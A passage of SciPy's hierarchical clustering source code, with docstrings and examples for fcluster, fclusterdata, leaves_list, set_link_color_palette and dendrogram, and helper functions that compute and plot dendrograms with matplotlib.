the two clusters merged at each step, the third element is the\n distance between these clusters, and the fourth element is the size of\n the new cluster - the number of original data points included.\n\n `scipy.cluster.hierarchy.fcluster` can be used to flatten the\n dendrogram, obtaining as a result an assignment of the original data\n points to single clusters.\n\n This assignment mostly depends on a distance threshold ``t`` - the maximum\n inter-cluster distance allowed:\n\n >>> fcluster(Z, t=0.9, criterion='distance')\n array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], dtype=int32)\n\n >>> fcluster(Z, t=1.1, criterion='distance')\n array([1, 1, 2, 3, 3, 4, 5, 5, 6, 7, 7, 8], dtype=int32)\n\n >>> fcluster(Z, t=3, criterion='distance')\n array([1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=int32)\n\n >>> fcluster(Z, t=9, criterion='distance')\n array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int32)\n\n In the first case, the threshold ``t`` is too small to allow any two\n samples in the data to form a cluster, so 12 different clusters are\n returned.\n\n In the second case, the threshold is large enough to allow the first\n 4 points to be merged with their nearest neighbors. 
So, here, only 8\n clusters are returned.\n\n The third case, with a much higher threshold, allows for up to 8 data\n points to be connected - so 4 clusters are returned here.\n\n Lastly, the threshold of the fourth case is large enough to allow for\n all data points to be merged together - so a single cluster is returned.\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', dtype=xp.float64, xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n\n n = Z.shape[0] + 1\n T = np.zeros((n,), dtype='i')\n\n if monocrit is not None:\n monocrit = np.asarray(monocrit, order='C', dtype=np.float64)\n\n Z = np.asarray(Z)\n monocrit = np.asarray(monocrit)\n if criterion == 'inconsistent':\n if R is None:\n R = inconsistent(Z, depth)\n else:\n R = as_xparray(R, order='C', dtype=xp.float64, xp=xp)\n is_valid_im(R, throw=True, name='R')\n # Since the C code does not support striding using strides,\n # the dimensions are used instead.\n R = np.asarray(R)\n _hierarchy.cluster_in(Z, R, T, float(t), int(n))\n elif criterion == 'distance':\n _hierarchy.cluster_dist(Z, T, float(t), int(n))\n elif criterion == 'maxclust':\n _hierarchy.cluster_maxclust_dist(Z, T, int(n), t)\n elif criterion == 'monocrit':\n _hierarchy.cluster_monocrit(Z, monocrit, T, float(t), int(n))\n elif criterion == 'maxclust_monocrit':\n _hierarchy.cluster_maxclust_monocrit(Z, monocrit, T, int(n), int(t))\n else:\n raise ValueError('Invalid cluster formation criterion: %s'\n % str(criterion))\n return xp.asarray(T)\n\n\ndef fclusterdata(X, t, criterion='inconsistent',\n metric='euclidean', depth=2, method='single', R=None):\n \"\"\"\n Cluster observation data using a given metric.\n\n Clusters the original observations in the n-by-m data\n matrix X (n observations in m dimensions), using the euclidean\n distance metric to calculate distances between original observations,\n performs hierarchical clustering using the single linkage algorithm,\n and forms flat clusters using the inconsistency method with `t` as the\n cut-off threshold.\n\n A 1-D array ``T`` of length ``n`` is returned. ``T[i]`` is\n the index of the flat cluster to which the original observation ``i``\n belongs.\n\n Parameters\n ----------\n X : (N, M) ndarray\n N by M data matrix with N observations in M dimensions.\n t : scalar\n For criteria 'inconsistent', 'distance' or 'monocrit',\n this is the threshold to apply when forming flat clusters.\n For 'maxclust' or 'maxclust_monocrit' criteria,\n this would be the maximum number of clusters requested.\n criterion : str, optional\n Specifies the criterion for forming flat clusters. Valid\n values are 'inconsistent' (default), 'distance', or 'maxclust'.\n See `fcluster` for descriptions.\n metric : str or function, optional\n The distance metric for calculating pairwise distances. See\n ``distance.pdist`` for descriptions, and `linkage` to verify\n compatibility with the linkage method.\n depth : int, optional\n The maximum depth for the inconsistency calculation. See\n `inconsistent` for more information.\n method : str, optional\n The linkage method to use (single, complete, average,\n weighted, median, centroid, ward). See `linkage` for more\n information. Default is "single".\n R : ndarray, optional\n The inconsistency matrix. It will be computed if necessary\n if it is not passed.\n\n Returns\n -------\n fclusterdata : ndarray\n A vector of length ``n``. 
``T[i]`` is the flat cluster number to\n which original observation ``i`` belongs.\n\n See Also\n --------\n scipy.spatial.distance.pdist : pairwise distance metrics\n\n Notes\n -----\n This function is similar to the MATLAB function ``clusterdata``.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import fclusterdata\n\n This is a convenience method that abstracts all the steps to perform in a\n typical SciPy hierarchical clustering workflow.\n\n * Transform the input data into a condensed matrix with `scipy.spatial.distance.pdist`.\n\n * Apply a clustering method.\n\n * Obtain flat clusters at a user-defined distance threshold ``t`` using `scipy.cluster.hierarchy.fcluster`.\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... [4, 4], [3, 4], [4, 3]]\n\n >>> fclusterdata(X, t=1)\n array([3, 3, 3, 4, 4, 4, 2, 2, 2, 1, 1, 1], dtype=int32)\n\n The output here (for the dataset ``X``, distance threshold ``t``, and the\n default settings) is four clusters with three data points each.\n\n \"\"\"\n xp = array_namespace(X)\n X = as_xparray(X, order='C', dtype=xp.float64, xp=xp)\n\n if X.ndim != 2:\n raise TypeError('The observation matrix X must be an n by m '\n 'array.')\n\n Y = distance.pdist(X, metric=metric)\n Y = xp.asarray(Y)\n Z = linkage(Y, method=method)\n if R is None:\n R = inconsistent(Z, d=depth)\n else:\n R = as_xparray(R, order='c', xp=xp)\n T = fcluster(Z, criterion=criterion, depth=depth, R=R, t=t)\n return T\n\n\ndef leaves_list(Z):\n \"\"\"\n Return a list of leaf node ids.\n\n The returned list corresponds to the observation vector index as it appears\n in the tree from left to right. Z is a linkage matrix.\n\n Parameters\n ----------\n Z : ndarray\n The hierarchical clustering encoded as a matrix. `Z` is\n a linkage matrix. See `linkage` for more information.\n\n Returns\n -------\n leaves_list : ndarray\n The list of leaf node ids.\n\n See Also\n --------\n dendrogram : for information about dendrogram structure.\n\n Examples\n --------\n >>> from scipy.cluster.hierarchy import ward, dendrogram, leaves_list\n >>> from scipy.spatial.distance import pdist\n >>> from matplotlib import pyplot as plt\n\n >>> X = [[0, 0], [0, 1], [1, 0],\n ... [0, 4], [0, 3], [1, 4],\n ... [4, 0], [3, 0], [4, 1],\n ... 
[4, 4], [3, 4], [4, 3]]\n\n >>> Z = ward(pdist(X))\n\n The linkage matrix ``Z`` represents a dendrogram, that is, a tree that\n encodes the structure of the clustering performed.\n `scipy.cluster.hierarchy.leaves_list` shows the mapping between\n indices in the ``X`` dataset and leaves in the dendrogram:\n\n >>> leaves_list(Z)\n array([ 2, 0, 1, 5, 3, 4, 8, 6, 7, 11, 9, 10], dtype=int32)\n\n >>> fig = plt.figure(figsize=(25, 10))\n >>> dn = dendrogram(Z)\n >>> plt.show()\n\n \"\"\"\n xp = array_namespace(Z)\n Z = as_xparray(Z, order='C', xp=xp)\n is_valid_linkage(Z, throw=True, name='Z')\n n = Z.shape[0] + 1\n ML = np.zeros((n,), dtype='i')\n Z = np.asarray(Z)\n _hierarchy.prelist(Z, ML, n)\n return xp.asarray(ML)\n\n\n# Maps number of leaves to text size.\n#\n# p <= 20, size="12"\n# 20 < p <= 30, size="10"\n# 30 < p <= 50, size="8"\n# 50 < p <= 85, size="6"\n# 85 < p, size="5"\n\n_dtextsizes = {20: 12, 30: 10, 50: 8, 85: 6, np.inf: 5}\n_drotation = {20: 0, 40: 45, np.inf: 90}\n_dtextsortedkeys = list(_dtextsizes.keys())\n_dtextsortedkeys.sort()\n_drotationsortedkeys = list(_drotation.keys())\n_drotationsortedkeys.sort()\n\n\ndef _remove_dups(L):\n \"\"\"\n Remove duplicates AND preserve the original order of the elements.\n\n The set class is not guaranteed to do this.\n \"\"\"\n seen_before = set()\n L2 = []\n for i in L:\n if i not in seen_before:\n seen_before.add(i)\n L2.append(i)\n return L2\n\n\ndef _get_tick_text_size(p):\n for k in _dtextsortedkeys:\n if p <= k:\n return _dtextsizes[k]\n\n\ndef _get_tick_rotation(p):\n for k in _drotationsortedkeys:\n if p <= k:\n return _drotation[k]\n\n\ndef _plot_dendrogram(icoords, dcoords, ivl, p, n, mh, orientation,\n no_labels, color_list, leaf_font_size=None,\n leaf_rotation=None, contraction_marks=None,\n ax=None, above_threshold_color='C0'):\n # Import matplotlib here so that it's not imported unless dendrograms\n # are plotted. Raise an informative error if importing fails.\n try:\n # if an axis is provided, don't use pylab at all\n if ax is None:\n import matplotlib.pylab\n import matplotlib.patches\n import matplotlib.collections\n except ImportError as e:\n raise ImportError("You must install the matplotlib library to plot "\n "the dendrogram. 
Use no_plot=True to calculate the \"\n \"dendrogram without plotting.\") from e\n\n if ax is None:\n ax = matplotlib.pylab.gca()\n # if we're using pylab, we want to trigger a draw at the end\n trigger_redraw = True\n else:\n trigger_redraw = False\n\n # Independent variable plot width\n ivw = len(ivl) * 10\n # Dependent variable plot height\n dvw = mh + mh * 0.05\n\n iv_ticks = np.arange(5, len(ivl) * 10 + 5, 10)\n if orientation in ('top', 'bottom'):\n if orientation == 'top':\n ax.set_ylim([0, dvw])\n ax.set_xlim([0, ivw])\n else:\n ax.set_ylim([dvw, 0])\n ax.set_xlim([0, ivw])\n\n xlines = icoords\n ylines = dcoords\n if no_labels:\n ax.set_xticks([])\n ax.set_xticklabels([])\n else:\n ax.set_xticks(iv_ticks)\n\n if orientation == 'top':\n ax.xaxis.set_ticks_position('bottom')\n else:\n ax.xaxis.set_ticks_position('top')\n\n # Make the tick marks invisible because they cover up the links\n for line in ax.get_xticklines():\n line.set_visible(False)\n\n leaf_rot = (float(_get_tick_rotation(len(ivl)))\n if (leaf_rotation is None) else leaf_rotation)\n leaf_font = (float(_get_tick_text_size(len(ivl)))\n if (leaf_font_size is None) else leaf_font_size)\n ax.set_xticklabels(ivl, rotation=leaf_rot, size=leaf_font)\n\n elif orientation in ('left', 'right'):\n if orientation == 'left':\n ax.set_xlim([dvw, 0])\n ax.set_ylim([0, ivw])\n else:\n ax.set_xlim([0, dvw])\n ax.set_ylim([0, ivw])\n\n xlines = dcoords\n ylines = icoords\n if no_labels:\n ax.set_yticks([])\n ax.set_yticklabels([])\n else:\n ax.set_yticks(iv_ticks)\n\n if orientation == 'left':\n ax.yaxis.set_ticks_position('right')\n else:\n ax.yaxis.set_ticks_position('left')\n\n # Make the tick marks invisible because they cover up the links\n for line in ax.get_yticklines():\n line.set_visible(False)\n\n leaf_font = (float(_get_tick_text_size(len(ivl)))\n if (leaf_font_size is None) else leaf_font_size)\n\n if leaf_rotation is not None:\n ax.set_yticklabels(ivl, rotation=leaf_rotation, size=leaf_font)\n else:\n ax.set_yticklabels(ivl, size=leaf_font)\n\n # Let's use collections instead. 
This way there is a separate legend item\n # for each tree grouping, rather than one for each line segment.\n colors_used = _remove_dups(color_list)\n color_to_lines = {}\n for color in colors_used:\n color_to_lines[color] = []\n for (xline, yline, color) in zip(xlines, ylines, color_list):\n color_to_lines[color].append(list(zip(xline, yline)))\n\n colors_to_collections = {}\n # Construct the collections.\n for color in colors_used:\n coll = matplotlib.collections.LineCollection(color_to_lines[color],\n colors=(color,))\n colors_to_collections[color] = coll\n\n # Add all the groupings below the color threshold.\n for color in colors_used:\n if color != above_threshold_color:\n ax.add_collection(colors_to_collections[color])\n # If there's a grouping of links above the color threshold, it goes last.\n if above_threshold_color in colors_to_collections:\n ax.add_collection(colors_to_collections[above_threshold_color])\n\n if contraction_marks is not None:\n Ellipse = matplotlib.patches.Ellipse\n for (x, y) in contraction_marks:\n if orientation in ('left', 'right'):\n e = Ellipse((y, x), width=dvw / 100, height=1.0)\n else:\n e = Ellipse((x, y), width=1.0, height=dvw / 100)\n ax.add_artist(e)\n e.set_clip_box(ax.bbox)\n e.set_alpha(0.5)\n e.set_facecolor('k')\n\n if trigger_redraw:\n matplotlib.pylab.draw_if_interactive()\n\n\n# C0 is used for above threshold color\n_link_line_colors_default = ('C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9')\n_link_line_colors = list(_link_line_colors_default)\n\n\ndef set_link_color_palette(palette):\n \"\"\"\n Set list of matplotlib color codes for use by dendrogram.\n\n Note that this palette is global (i.e., setting it once changes the colors\n for all subsequent calls to `dendrogram`) and that it affects only the\n colors below ``color_threshold``.\n\n Note that `dendrogram` also accepts a custom coloring function through its\n ``link_color_func`` keyword, which is more flexible and non-global.\n\n Parameters\n ----------\n palette : list of str or None\n A list of matplotlib color codes. The order of the color codes is the\n order in which the colors are cycled through when color thresholding in\n the dendrogram.\n\n If ``None``, resets the palette to its default (which are matplotlib\n default colors C1 to C9).\n\n Returns\n -------\n None\n\n See Also\n --------\n dendrogram\n\n Notes\n -----\n Ability to reset the palette with ``None`` added in SciPy 0.17.0.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> ytdist = np.array([662., 877., 255., 412., 996., 295., 468., 268.,\n ... 400., 754., 564., 138., 219., 869., 669.])\n >>> Z = hierarchy.linkage(ytdist, 'single')\n >>> dn = hierarchy.dendrogram(Z, no_plot=True)\n >>> dn['color_list']\n ['C1', 'C0', 'C0', 'C0', 'C0']\n >>> hierarchy.set_link_color_palette(['c', 'm', 'y', 'k'])\n >>> dn = hierarchy.dendrogram(Z, no_plot=True, above_threshold_color='b')\n >>> dn['color_list']\n ['c', 'b', 'b', 'b', 'b']\n >>> dn = hierarchy.dendrogram(Z, no_plot=True, color_threshold=267,\n ... 
above_threshold_color='k')\n >>> dn['color_list']\n ['c', 'm', 'm', 'k', 'k']\n\n Now, reset the color palette to its default:\n\n >>> hierarchy.set_link_color_palette(None)\n\n \"\"\"\n if palette is None:\n # reset to its default\n palette = _link_line_colors_default\n elif not isinstance(palette, (list, tuple)):\n raise TypeError("palette must be a list or tuple")\n _ptypes = [isinstance(p, str) for p in palette]\n\n if False in _ptypes:\n raise TypeError("all palette list elements must be color strings")\n\n global _link_line_colors\n _link_line_colors = palette\n\n\ndef dendrogram(Z, p=30, truncate_mode=None, color_threshold=None,\n get_leaves=True, orientation='top', labels=None,\n count_sort=False, distance_sort=False, show_leaf_counts=True,\n no_plot=False, no_labels=False, leaf_font_size=None,\n leaf_rotation=None, leaf_label_func=None,\n show_contracted=False, link_color_func=None, ax=None,\n above_threshold_color='C0'):\n \"\"\"\n Plot the hierarchical clustering as a dendrogram.\n\n The dendrogram illustrates how each cluster is\n composed by drawing a U-shaped link between a non-singleton\n cluster and its children. The top of the U-link indicates a\n cluster merge. The two legs of the U-link indicate which clusters\n were merged. The length of the two legs of the U-link represents\n the distance between the child clusters. It is also the\n cophenetic distance between original observations in the two\n children clusters.\n\n Parameters\n ----------\n Z : ndarray\n The linkage matrix encoding the hierarchical clustering to\n render as a dendrogram. See the ``linkage`` function for more\n information on the format of ``Z``.\n p : int, optional\n The ``p`` parameter for ``truncate_mode``.\n truncate_mode : str, optional\n The dendrogram can be hard to read when the original\n observation matrix from which the linkage is derived is\n large. Truncation is used to condense the dendrogram. There\n are several modes:\n\n ``None``\n No truncation is performed (default).\n Note: ``'none'`` is an alias for ``None`` that's kept for\n backward compatibility.\n\n ``'lastp'``\n The last ``p`` non-singleton clusters formed in the linkage are the\n only non-leaf nodes in the linkage; they correspond to rows\n ``Z[n-p-2:end]`` in ``Z``. All other non-singleton clusters are\n contracted into leaf nodes.\n\n ``'level'``\n No more than ``p`` levels of the dendrogram tree are displayed.\n A "level" includes all nodes with ``p`` merges from the final merge.\n\n Note: ``'mtica'`` is an alias for ``'level'`` that's kept for\n backward compatibility.\n\n color_threshold : double, optional\n For brevity, let :math:`t` be the ``color_threshold``.\n Colors all the descendent links below a cluster node\n :math:`k` the same color if :math:`k` is the first node below\n the cut threshold :math:`t`. All links connecting nodes with\n distances greater than or equal to the threshold are colored\n with the default matplotlib color ``'C0'``. If :math:`t` is less\n than or equal to zero, all nodes are colored ``'C0'``.\n If ``color_threshold`` is None or 'default',\n corresponding with MATLAB(TM) behavior, the threshold is set to\n ``0.7*max(Z[:,2])``.\n\n get_leaves : bool, optional\n Includes a list ``R['leaves']=H`` in the result\n dictionary. 
For each :math:`i`, ``H[i] == j``, cluster node\n ``j`` appears in position ``i`` in the left-to-right traversal\n of the leaves, where :math:`j < 2n-1` and :math:`i < n`.\n orientation : str, optional\n The direction to plot the dendrogram, which can be any\n of the following strings:\n\n ``'top'``\n Plots the root at the top, and plots descendent links going downwards.\n (default).\n\n ``'bottom'``\n Plots the root at the bottom, and plots descendent links going\n upwards.\n\n ``'left'``\n Plots the root at the left, and plots descendent links going right.\n\n ``'right'``\n Plots the root at the right, and plots descendent links going left.\n\n labels : ndarray, optional\n By default, ``labels`` is None so the index of the original observation\n is used to label the leaf nodes. Otherwise, this is an :math:`n`-sized\n sequence, with ``n == Z.shape[0] + 1``. The ``labels[i]`` value is the\n text to put under the :math:`i` th leaf node only if it corresponds to\n an original observation and not a non-singleton cluster.\n count_sort : str or bool, optional\n For each node n, the order (visually, from left-to-right) in which n's\n two descendent links are plotted is determined by this\n parameter, which can be any of the following values:\n\n ``False``\n Nothing is done.\n\n ``'ascending'`` or ``True``\n The child with the minimum number of original objects in its cluster\n is plotted first.\n\n ``'descending'``\n The child with the maximum number of original objects in its cluster\n is plotted first.\n\n Note, ``distance_sort`` and ``count_sort`` cannot both be True.\n distance_sort : str or bool, optional\n For each node n, the order (visually, from left-to-right) in which n's\n two descendent links are plotted is determined by this\n parameter, which can be any of the following values:\n\n ``False``\n Nothing is done.\n\n ``'ascending'`` or ``True``\n The child with the minimum distance between its direct descendents is\n plotted first.\n\n ``'descending'``\n The child with the maximum distance between its direct descendents is\n plotted first.\n\n Note ``distance_sort`` and ``count_sort`` cannot both be True.\n show_leaf_counts : bool, optional\n When True, leaf nodes representing :math:`k>1` original\n observations are labeled with the number of observations they\n contain in parentheses.\n no_plot : bool, optional\n When True, the final rendering is not performed. This is\n useful if only the data structures computed for the rendering\n are needed or if matplotlib is not available.\n no_labels : bool, optional\n When True, no labels appear next to the leaf nodes in the\n rendering of the dendrogram.\n leaf_rotation : double, optional\n Specifies the angle (in degrees) to rotate the leaf\n labels. When unspecified, the rotation is based on the number of\n nodes in the dendrogram (default is 0).\n leaf_font_size : int, optional\n Specifies the font size (in points) of the leaf labels. When\n unspecified, the size is based on the number of nodes in the\n dendrogram.\n leaf_label_func : lambda or function, optional\n When ``leaf_label_func`` is a callable function, it is called for each\n leaf with cluster index :math:`k < 2n-1`. 
The function\n is expected to return a string with the label for the\n leaf.\n\n Indices :math:`k < n` correspond to original observations\n while indices :math:`k \\geq n` correspond to non-singleton\n clusters.\n\n For example, to label singletons with their node id and\n non-singletons with their id, count, and inconsistency\n coefficient, simply do::\n\n # First define the leaf label function.\n def llf(id):\n if id < n:\n return str(id)\n else:\n return '[%d %d %1.2f]' % (id, count, R[n-id,3])\n\n # The text for the leaf nodes is going to be big so force\n # a rotation of 90 degrees.\n dendrogram(Z, leaf_label_func=llf, leaf_rotation=90)\n\n # leaf_label_func can also be used together with ``truncate_mode`` parameter,\n # in which case you will get your leaves labeled after truncation:\n dendrogram(Z, leaf_label_func=llf, leaf_rotation=90,\n truncate_mode='level', p=2)\n\n show_contracted : bool, optional\n When True the heights of non-singleton nodes contracted\n into a leaf node are plotted as crosses along the link\n connecting that leaf node. This really is only useful when\n truncation is used (see ``truncate_mode`` parameter).\n link_color_func : callable, optional\n If given, `link_color_func` is called with each non-singleton id\n corresponding to each U-shaped link it will paint. The function is\n expected to return the color to paint the link, encoded as a matplotlib\n color string code. For example::\n\n dendrogram(Z, link_color_func=lambda k: colors[k])\n\n colors the direct links below each untruncated non-singleton node\n ``k`` using ``colors[k]``.\n ax : matplotlib Axes instance, optional\n If None and `no_plot` is not True, the dendrogram will be plotted\n on the current axes. Otherwise if `no_plot` is not True the\n dendrogram will be plotted on the given ``Axes`` instance. This can be\n useful if the dendrogram is part of a more complex figure.\n above_threshold_color : str, optional\n This matplotlib color string sets the color of the links above the\n color_threshold. The default is ``'C0'``.\n\n Returns\n -------\n R : dict\n A dictionary of data structures computed to render the\n dendrogram. It has the following keys:\n\n ``'color_list'``\n A list of color names. The k'th element represents the color of the\n k'th link.\n\n ``'icoord'`` and ``'dcoord'``\n Each of them is a list of lists. Let ``icoord = [I1, I2, ..., Ip]``\n where ``Ik = [xk1, xk2, xk3, xk4]`` and ``dcoord = [D1, D2, ..., Dp]``\n where ``Dk = [yk1, yk2, yk3, yk4]``, then the k'th link painted is\n ``(xk1, yk1)`` - ``(xk2, yk2)`` - ``(xk3, yk3)`` - ``(xk4, yk4)``.\n\n ``'ivl'``\n A list of labels corresponding to the leaf nodes.\n\n ``'leaves'``\n For each i, ``H[i] == j``, cluster node ``j`` appears in position\n ``i`` in the left-to-right traversal of the leaves, where\n :math:`j < 2n-1` and :math:`i < n`. If ``j`` is less than ``n``, the\n ``i``-th leaf node corresponds to an original observation.\n Otherwise, it corresponds to a non-singleton cluster.\n\n ``'leaves_color_list'``\n A list of color names. The k'th element represents the color of the\n k'th leaf.\n\n See Also\n --------\n linkage, set_link_color_palette\n\n Notes\n -----\n It is expected that the distances in ``Z[:,2]`` be monotonic, otherwise\n crossings appear in the dendrogram.\n\n Examples\n --------\n >>> import numpy as np\n >>> from scipy.cluster import hierarchy\n >>> import matplotlib.pyplot as plt\n\n A very basic example:\n\n >>> ytdist = np.array([662., 877., 255., 412., 996., 295., 468., 268.,\n ... 
400., 754., 564., 138., 219., 869., 669.])\n >>> Z = hierarchy.linkage(ytdist, 'single')\n >>> plt.figure()\n >>> dn = hierarchy.dendrogram(Z)\n\n Now, plot in given axes, improve the color scheme and use both vertical and\n horizontal orientations:\n\n >>> hierarchy.set_link_color_palette(['m', 'c', 'y', 'k'])\n >>> fig, axes = plt.subplots(1, 2, figsize=(8, 3))\n >>> dn1 = hierarchy.dendrogram(Z, ax=axes[0], above_threshold_color='y',\n ... orientation='top')\n >>> dn2 = hierarchy.dendrogram(Z, ax=axes[1],\n ... above_threshold_color='#bcbddc',\n ... orientation='right')\n >>> hierarchy.set_link_color_palette(None) # reset to default after use\n >>> plt.show()\n\n \"\"\"\n # This feature was thought about but never implemented (still useful?):\n #\n # ... = dendrogram(..., leaves_order=None)\n #\n # Plots the leaves in the order specified by a vector of\n # original observation indices. If the vector contains duplicates\n # or results in a crossing, an exception will be thrown. Passing\n # None orders leaf nodes based on the order they appear in the\n # pre-order traversal.\n Z = as_xparray(Z, order='c')\n\n if orientation not in [\"top\", \"left\", \"bottom\", \"right\"]:\n raise ValueError(\"orientation must be one of 'top', 'left', \"\n \"'bottom', or 'right'\")\n\n if labels is not None:\n try:\n len_labels = len(labels)\n except (TypeError, AttributeError):\n len_labels = labels.shape[0]\n if Z.shape[0] + 1 != len_labels:\n raise ValueError(\"Dimensions of Z and labels must be consistent.\")\n\n is_valid_linkage(Z, throw=True, name='Z')\n Zs = Z.shape\n n = Zs[0] + 1\n if isinstance(p, (int, float)):\n p = int(p)\n else:\n raise TypeError('The second argument must be a number')\n\n if truncate_mode not in ('lastp', 'mtica', 'level', 'none', None):\n # 'mtica' is kept working for backwards compat.\n raise ValueError('Invalid truncation mode.')\n\n if truncate_mode == 'lastp':\n if p > n or p == 0:\n p = n\n\n if truncate_mode == 'mtica':\n # 'mtica' is an alias\n truncate_mode = 'level'\n\n if truncate_mode == 'level':\n if p <= 0:\n p = np.inf\n\n if get_leaves:\n lvs = []\n else:\n lvs = None\n\n icoord_list = []\n dcoord_list = []\n color_list = []\n current_color = [0]\n currently_below_threshold = [False]\n ivl = [] # list of leaves\n\n if color_threshold is None or (isinstance(color_threshold, str) and\n color_threshold == 'default'):\n color_threshold = max(Z[:, 2]) * 0.7\n\n R = {'icoord': icoord_list, 'dcoord': dcoord_list, 'ivl': ivl,\n 'leaves': lvs, 'color_list': color_list}\n\n # Empty list will be filled in _dendrogram_calculate_info\n contraction_marks = [] if show_contracted else None\n\n _dendrogram_calculate_info(\n Z=Z, p=p,\n truncate_mode=truncate_mode,\n color_threshold=color_threshold,\n get_leaves=get_leaves,\n orientation=orientation,\n labels=labels,\n count_sort=count_sort,\n distance_sort=distance_sort,\n show_leaf_counts=show_leaf_counts,\n i=2*n - 2,\n iv=0.0,\n ivl=ivl,\n n=n,\n icoord_list=icoord_list,\n dcoord_list=dcoord_list,\n lvs=lvs,\n current_color=current_color,\n color_list=color_list,\n currently_below_threshold=currently_below_threshold,\n leaf_label_func=leaf_label_func,\n contraction_marks=contraction_marks,\n link_color_func=link_color_func,\n above_threshold_color=above_threshold_color)\n\n if not no_plot:\n mh = max(Z[:, 2])\n _plot_dendrogram(icoord_list, dcoord_list, ivl, p, n, mh, orientation,\n no_labels, color_list,\n leaf_font_size=leaf_font_size,\n leaf_rotation=leaf_rotation,\n contraction_marks=contraction_marks,\n ax=ax,\n 
above_threshold_color=above_threshold_color)\n\n R[\"leaves_color_list\"] = _get_leaves_color_list(R)\n\n return R\n\n\ndef _get_leaves_color_list(R):\n leaves_color_list = [None] * len(R['leaves'])\n for link_x, link_y, link_color in zip(R['icoord'],\n R['dcoord'],\n R['color_list']):\n for (xi, yi) in zip(link_x, link_y):\n if yi == 0.0 and (xi % 5 == 0 and xi % 2 == 1):\n # if yi is 0.0 and xi is divisible by 5 and odd,\n # the point is a leaf\n # xi of leaves are 5, 15, 25, 35, ... (see `iv_ticks`)\n # index of leaves are 0, 1, 2, 3, ... as below\n leaf_index = (int(xi) - 5) // 10\n # each leaf has a same color of its link.\n leaves_color_list[leaf_index] = link_color\n return leaves_color_list\n\n\ndef _append_singleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,\n i, labels):\n # If the leaf id structure is not None and is a list then the caller\n # to dendrogram has indicated that cluster id's corresponding to the\n # leaf nodes should be recorded.\n\n if lvs is not None:\n lvs.append(int(i))\n\n # If leaf node labels are to be displayed...\n if ivl is not None:\n # If a leaf_label_func has been provided, the label comes from the\n # string returned from the leaf_label_func, which is a function\n # passed to dendrogram.\n if leaf_label_func:\n ivl.append(leaf_label_func(int(i)))\n else:\n # Otherwise, if the dendrogram caller has passed a labels list\n # for the leaf nodes, use it.\n if labels is not None:\n ivl.append(labels[int(i - n)])\n else:\n # Otherwise, use the id as the label for the leaf.x\n ivl.append(str(int(i)))\n\n\ndef _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,\n i, labels, show_leaf_counts):\n # If the leaf id structure is not None and is a list then the caller\n # to dendrogram has indicated that cluster id's corresponding to the\n # leaf nodes should be recorded.\n\n if lvs is not None:\n lvs.append(int(i))\n if ivl is not None:\n if leaf_label_func:\n ivl.append(leaf_label_func(int(i)))\n else:\n if show_leaf_counts:\n ivl.append(\"(\" + str(np.asarray(Z[i - n, 3], dtype=np.int64)) + \")\")\n else:\n ivl.append(\"\")\n\n\ndef _append_contraction_marks(Z, iv, i, n, contraction_marks, xp):\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 0], xp),\n n, contraction_marks, xp)\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 1], xp),\n n, contraction_marks, xp)\n\n\ndef _append_contraction_marks_sub(Z, iv, i, n, contraction_marks, xp):\n if i >= n:\n contraction_marks.append((iv, Z[i - n, 2]))\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 0], xp),\n n, contraction_marks, xp)\n _append_contraction_marks_sub(Z, iv, int_floor(Z[i - n, 1], xp),\n n, contraction_marks, xp)\n\n\ndef _dendrogram_calculate_info(Z, p, truncate_mode,\n color_threshold=np.inf, get_leaves=True,\n orientation='top', labels=None,\n count_sort=False, distance_sort=False,\n show_leaf_counts=False, i=-1, iv=0.0,\n ivl=[], n=0, icoord_list=[], dcoord_list=[],\n lvs=None, mhr=False,\n current_color=[], color_list=[],\n currently_below_threshold=[],\n leaf_label_func=None, level=0,\n contraction_marks=None,\n link_color_func=None,\n above_threshold_color='C0'):\n \"\"\"\n Calculate the endpoints of the links as well as the labels for the\n the dendrogram rooted at the node with index i. 
iv is the independent\n variable value to plot the left-most leaf node below the root node i\n (if orientation='top', this would be the left-most x value where the\n plotting of this root node i and its descendents should begin).\n\n ivl is a list to store the labels of the leaf nodes. The leaf_label_func\n is called whenever ivl != None, labels == None, and\n leaf_label_func != None. When ivl != None and labels != None, the\n labels list is used only for labeling the leaf nodes. When\n ivl == None, no labels are generated for leaf nodes.\n\n When get_leaves==True, a list of leaves is built as they are visited\n in the dendrogram.\n\n Returns a tuple with l being the independent variable coordinate that\n corresponds to the midpoint of cluster to the left of cluster i if\n i is non-singleton, otherwise the independent coordinate of the leaf\n node if i is a leaf node.\n\n Returns\n -------\n A tuple (left, w, h, md), where:\n * left is the independent variable coordinate of the center of the\n the U of the subtree\n\n * w is the amount of space used for the subtree (in independent\n variable units)\n\n * h is the height of the subtree in dependent variable units\n\n * md is the ``max(Z[*,2]``) for all nodes ``*`` below and including\n the target node.\n\n \"\"\"\n xp = array_namespace(Z)\n if n == 0:\n raise ValueError(\"Invalid singleton cluster count n.\")\n\n if i == -1:\n raise ValueError(\"Invalid root cluster index i.\")\n\n if truncate_mode == 'lastp':\n # If the node is a leaf node but corresponds to a non-singleton\n # cluster, its label is either the empty string or the number of\n # original observations belonging to cluster i.\n if 2*n - p > i >= n:\n d = Z[i - n, 2]\n _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels,\n show_leaf_counts)\n if contraction_marks is not None:\n _append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks, xp)\n return (iv + 5.0, 10.0, 0.0, d)\n elif i < n:\n _append_singleton_leaf_node(Z, p, n, level, lvs, ivl,\n leaf_label_func, i, labels)\n return (iv + 5.0, 10.0, 0.0, 0.0)\n elif truncate_mode == 'level':\n if i > n and level > p:\n d = Z[i - n, 2]\n _append_nonsingleton_leaf_node(Z, p, n, level, 